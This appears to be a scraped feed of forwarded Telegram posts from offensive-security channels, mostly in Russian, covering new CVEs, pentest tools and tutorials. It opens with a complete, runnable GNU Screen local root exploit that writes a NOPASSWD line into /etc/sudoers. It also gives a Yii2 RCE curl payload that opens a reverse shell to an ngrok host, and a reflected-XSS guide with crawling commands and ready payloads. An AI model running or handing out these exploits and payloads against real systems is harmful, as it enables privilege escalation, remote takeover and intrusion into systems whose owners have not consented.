Forwarded from 1N73LL1G3NC3
CVE-2025-23395 Screen LPE exploit
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
#!/bin/sh
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
👍2🔥1
Forwarded from Offensive Xwitter
😈 [ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Forwarded from Offensive Xwitter
😈 [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Forwarded from Proxy Bar
CVE-2024–58136 — RCE PoC
*
Yii2 Framework
*
Yii2 Framework
curl -k -X POST https://sub.domain.tld/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'
Forwarded from PurpleBear (Vadim Shelest)
Всем привет!
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...
В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про
Вообще
💥Таким образом
✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации
❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует
🔧 Gospider - довольно быстрый веб краулер на Go
✅ Объединяем и сортируем выхлопы в один файлик:
✅ Определяем живые хосты с помощью httpx
✅ Сортируем выхлоп по расширениям:
✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
🔧 Используем полезную нагрузку:
🔐 Reflected Inside HTML Tag Attributes
🔧 Используем полезную нагрузку:
📜 Reflected Inside JavaScript
🔧 Используем полезную нагрузку:
✅ Сдаем багу
✅ Вы великолепны💸
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...
Reflected XSS😂В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про
XSS, только контекст обычно зависит от грейда кандидата.Вообще
XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году.💥Таким образом
XSS:✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации
❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует
web.archive.org для поиска url доменов из спискаparamspider -l targets.txt🔧 Gospider - довольно быстрый веб краулер на Go
gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \
--blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \
-q | tee gospider-out.txt✅ Объединяем и сортируем выхлопы в один файлик:
cd paramspider/output
cat *.txt > paramspider_out.txt
cat paramspider_out.txt | sort -u | tee tragets_url.txt✅ Определяем живые хосты с помощью httpx
httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt✅ Сортируем выхлоп по расширениям:
cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt
cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt
cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt
cat live_tragets_url.txt | grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt
cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
<p>"><zxcvbro>Bro</p>🔧 Используем полезную нагрузку:
<img src=x onerror=prompt(1)>
<details open ontoggle=prompt(origin)>
<svg onload=confirm(1)>🔐 Reflected Inside HTML Tag Attributes
<input value="><zxcvbro>Bro">🔧 Используем полезную нагрузку:
" autofocus onfocus=alert(document.domain) x="
"><script>alert(1)</script>📜 Reflected Inside JavaScript
<script>
var input = '"><zxcvbro>Bro';
</script>🔧 Используем полезную нагрузку:
';alert(1)//
'-alert(1)-'
</script><img src=1 onerror=alert(1)>✅ Сдаем багу
✅ Вы великолепны💸
GitHub
GitHub - devanshbatham/ParamSpider: Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing - GitHub - devanshbatham/ParamSpider: Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/f...
Ого, какой крутой вектор атаки выстроил т.н. "белый хакер" @baksist!
🤯1
Forwarded from YAH
Как цепочка классических багов может привести к полной компрометации
Мой коллега из Singleton Security, старший спец. по анализу защищенности @baksist выкатил на Хакере прикольный разбор пентеста интернет-провайдера.
Типичная грустная ситуация для пентестеров, которым достался маленький скоуп (всего 9 IP), переросла в неплохешную цепочку багов, приведших к компрометации серверов провайдера.
Внутри — полный сборник трешовых ошибок разрабов, которые классно склеились во что-то единое:
— LFR через кривой rewrite
— MD5-хеши без соли
— повторы паролей
— самописная ERP с PTRAV при аплоаде
— отсутствие нормальной изоляции между сервисами
🧂 Про соль отдельно. Когда хранят MD5 без соли, это как хранить ключи в конверте с подписью «ключи от дома». Нравоучать не буду, разрабов которые в 2025 юзают MD5 для хранения паролей проще просто пристрелить и купить подписку на ChatGPT за 20$.
Рекомендую, кайфово почитать прохладную про блуждания хакера в PHP сервисах:
https://xakep.ru/2025/05/22/provider-case/
baksist, респект 💪
Мой коллега из Singleton Security, старший спец. по анализу защищенности @baksist выкатил на Хакере прикольный разбор пентеста интернет-провайдера.
Типичная грустная ситуация для пентестеров, которым достался маленький скоуп (всего 9 IP), переросла в неплохешную цепочку багов, приведших к компрометации серверов провайдера.
Внутри — полный сборник трешовых ошибок разрабов, которые классно склеились во что-то единое:
— LFR через кривой rewrite
— MD5-хеши без соли
— повторы паролей
— самописная ERP с PTRAV при аплоаде
— отсутствие нормальной изоляции между сервисами
🧂 Про соль отдельно. Когда хранят MD5 без соли, это как хранить ключи в конверте с подписью «ключи от дома». Нравоучать не буду, разрабов которые в 2025 юзают MD5 для хранения паролей проще просто пристрелить и купить подписку на ChatGPT за 20$.
Рекомендую, кайфово почитать прохладную про блуждания хакера в PHP сервисах:
https://xakep.ru/2025/05/22/provider-case/
baksist, респект 💪
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Полный гайд по эксплуатации ADCS от ESC1 до ESC16. Понятно, что материалов по этой теме и так много, но пусть будет под рукой))
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
xbz0n.sh
Breaking ADCS: ESC1 to ESC16 Attack Techniques
Let's talk about Active Directory Certificate Services. If you've been doing red team work for any length of time, you've probably heard about ADCS attacks. ...
Forwarded from Cybred
🔥 9.9 Critical
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
Пошагово, как работает эксплоит:
1. Подменяет
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
4. Во время вызова GPG-логики, Roundcube вызывает
5. Триггерится код из первого шага
exploit // nuclei // research
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
_from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения. ?_task=settings&_action=upload&_from=mail%2Finbox
Пошагово, как работает эксплоит:
1. Подменяет
_from сериализованным объектом.2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
rcube_pgp_engine → Crypt_GPG_Engine.4. Во время вызова GPG-логики, Roundcube вызывает
unserialize().5. Триггерится код из первого шага
exploit // nuclei // research
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2025-32756: Fortinet UnAuth RCE
PoC: https://github.com/kn0x0x/CVE-2025-32756-POC
#exploit #git #pentest #redteam
PoC: https://github.com/kn0x0x/CVE-2025-32756-POC
Affected Products: FortiVoice, FortiMail, FortiNDR, FortiRecorder, FortiCamera
#exploit #git #pentest #redteam
Forwarded from Whitehat Lab
Простой скрипт для извлечения полезных данных из Neo4j базы, которую использует Bloodhound
Наглядно выводит информацию в консоль, коротко и по делу
python3 bhqc.py -h
python3 bhqc.py -p passwordNeo4JHere -d domain.local --heavy
#redteam #bloodhound #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Positive Technologies
Все записи PHDays Fest — уже на видеоплатформах 🤩
Разложили их по плейлистам, чтобы вам было удобно смотреть сотни часов крутейшего контента.
• Научпоп
«VK Видео» / RUTUBE
• Технологии под сомнением
«VK Видео» / RUTUBE
• Лица и грани кибербеза
«VK Видео» / RUTUBE
• Defense
«VK Видео» / RUTUBE
• Offense
«VK Видео» / RUTUBE
• Positive Labs
«VK Видео» / RUTUBE
• Архитектура ИБ
«VK Видео» / RUTUBE
• Development Security
«VK Видео» / RUTUBE
• Development Data
«VK Видео» / RUTUBE
• Open Source & Open Security
«VK Видео» / RUTUBE
• Development Ops
«VK Видео» / RUTUBE
• Devices & Technologies
«VK Видео» / RUTUBE
• Development People & Culture
«VK Видео» / RUTUBE
• ИТ-инфраструктура
«VK Видео» / RUTUBE
• AppSec-воркшопы
«VK Видео» / RUTUBE
• ИБ как она есть
«VK Видео» / RUTUBE
• Лайфхаки SOC
«VK Видео» / RUTUBE
• День инвестора POSI
«VK Видео» / RUTUBE
• Development General
«VK Видео» / RUTUBE
• Школа CISO
«VK Видео» / RUTUBE
• Fast track
«VK Видео» / RUTUBE
• Python Day
«VK Видео» / RUTUBE
• Web3
«VK Видео» / RUTUBE
• AI Track
«VK Видео» / RUTUBE
• Партнерский
«VK Видео» / RUTUBE
Также записи можно найти на нашем YouTube-канале и на сайте.
Приятного просмотра!🍿
#PHDays
@Positive_Technologies
Разложили их по плейлистам, чтобы вам было удобно смотреть сотни часов крутейшего контента.
• Научпоп
«VK Видео» / RUTUBE
• Технологии под сомнением
«VK Видео» / RUTUBE
• Лица и грани кибербеза
«VK Видео» / RUTUBE
• Defense
«VK Видео» / RUTUBE
• Offense
«VK Видео» / RUTUBE
• Positive Labs
«VK Видео» / RUTUBE
• Архитектура ИБ
«VK Видео» / RUTUBE
• Development Security
«VK Видео» / RUTUBE
• Development Data
«VK Видео» / RUTUBE
• Open Source & Open Security
«VK Видео» / RUTUBE
• Development Ops
«VK Видео» / RUTUBE
• Devices & Technologies
«VK Видео» / RUTUBE
• Development People & Culture
«VK Видео» / RUTUBE
• ИТ-инфраструктура
«VK Видео» / RUTUBE
• AppSec-воркшопы
«VK Видео» / RUTUBE
• ИБ как она есть
«VK Видео» / RUTUBE
• Лайфхаки SOC
«VK Видео» / RUTUBE
• День инвестора POSI
«VK Видео» / RUTUBE
• Development General
«VK Видео» / RUTUBE
• Школа CISO
«VK Видео» / RUTUBE
• Fast track
«VK Видео» / RUTUBE
• Python Day
«VK Видео» / RUTUBE
• Web3
«VK Видео» / RUTUBE
• AI Track
«VK Видео» / RUTUBE
• Партнерский
«VK Видео» / RUTUBE
Также записи можно найти на нашем YouTube-канале и на сайте.
Приятного просмотра!
#PHDays
@Positive_Technologies
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Whitehat Lab
Как и обещал, выкладываю обзор
Вопросы автору можно задать в чате или комментариях
Недавно я завершил курс и успешно сдал экзамен HTB Certified Active Directory Pentesting Expert (CAPE) от Hack The Box Academy. Меня зовут Артём Метельков, я занимаюсь пентестами инфраструктуры и фишинг-атаками. В этом обзоре поделюсь своими впечатлениями и расскажу, что вас ждёт на пути к этой сертификации.
HTB CAPE - это чисто практическая штука. Тут не просто учат, а реально проверяют, как ты усвоил материал. Экзамен - это стенд с 10+ машинами, несколькими доменами и разными трастами между ними. В общем, всё как в реальной жизни.
Коротко о курсе:
Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста
#htb #cert #exam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from Kali Linux
Kali Linux 2025.2 вышел!
Второе обновление Kali Linux в этом году — версия 2025.2 — приносит сразу 13 новых инструментов, полностью обновлённое меню приложений (оно теперь построено по структуре MITRE ATT&CK Framework), обновление GNOME до версии 48 и множество других улучшений.
Среди новинок — свежий набор инструментов.
● Улучшена интеграция VPN‑индикатора и обновлены BloodHound, NetHunter, CARsenal.
● Добавлены свежие утилиты: azurehound, binwalk3, bloodhound-ce-python, chisel, gitxray, ldeep, ligolo-ng, rubeus, tinja и др.
● В NetHunter — поддержка новых атак на Wi-Fi и авто, новые ядра для Android‑устройств и Raspberry Pi.
Новые инструменты:
- bloodhound-
- azurehound;
- bopscrk;
- chisel-common-binaries;
- crlfuzz;
- donut-shellcode;
- binwalk3;
- gitxray;
- tinja.
- ldeep;
- ligolo
- rubeus;
- sharphound;
📌 Подробнее
@linuxkalii
Второе обновление Kali Linux в этом году — версия 2025.2 — приносит сразу 13 новых инструментов, полностью обновлённое меню приложений (оно теперь построено по структуре MITRE ATT&CK Framework), обновление GNOME до версии 48 и множество других улучшений.
Среди новинок — свежий набор инструментов.
● Улучшена интеграция VPN‑индикатора и обновлены BloodHound, NetHunter, CARsenal.
● Добавлены свежие утилиты: azurehound, binwalk3, bloodhound-ce-python, chisel, gitxray, ldeep, ligolo-ng, rubeus, tinja и др.
● В NetHunter — поддержка новых атак на Wi-Fi и авто, новые ядра для Android‑устройств и Raspberry Pi.
Новые инструменты:
- bloodhound-
- azurehound;
- bopscrk;
- chisel-common-binaries;
- crlfuzz;
- donut-shellcode;
- binwalk3;
- gitxray;
- tinja.
- ldeep;
- ligolo
- rubeus;
- sharphound;
📌 Подробнее
@linuxkalii
Forwarded from SecuriXy.kz
Ну вот и PoC для недавно обнаруженной уязвимости в протоколе обмена файлами Windows (SMB) CVE-2025-33073
https://github.com/mverschu/CVE-2025-33073?tab=readme-ov-file
https://github.com/mverschu/CVE-2025-33073?tab=readme-ov-file
Forwarded from Offensive Xwitter
😈 [ SpecterOps @SpecterOps ]
Introducing the BloodHound Query Library!
📚 https://queries.specterops.io/
@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
🐥 [ tweet ]
Introducing the BloodHound Query Library!
📚 https://queries.specterops.io/
@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
🐥 [ tweet ]
❤1
Forwarded from Backconnect
#activedirectory #ad #pentest
Делаем свои словари для пентеста:
берем словарь (тык) + берем скрипт (тык)
Возможные шаблоны для генерации:
usage:
Делаем свои словари для пентеста:
берем словарь (тык) + берем скрипт (тык)
Возможные шаблоны для генерации:
i.s → a.ivanov
i_s → a_ivanov
is → aivanov
si → ivanova
s_i → ivanov_a
s.i → ivanov.a
s → ivanov
usage:
python3 word_gen.py russian_names/russian_trans_surnames.txt -o wordlist.txt -p s.i,s_i,i_s
🔥3
Forwarded from linkmeup
А все свою FreeIPA обновили? Там в 4.12.4 пофиксили CVE-2025-4404, через которую аутентифицированный юзер мог сам себе доменного админа выписать. Другой службы каталогов у нас для вас нет...
https://www.freeipa.org/release-notes/4-12-4.html
https://www.freeipa.org/release-notes/4-12-4.html
Forwarded from Волосатый бублик
Arbitrary File Read in pfSense 2.8.0 (authenticated user)
CVE ID: CVE-2025-53392
https://github.com/skraft9/pfsense-security-research
CVE ID: CVE-2025-53392
https://github.com/skraft9/pfsense-security-research
🤯1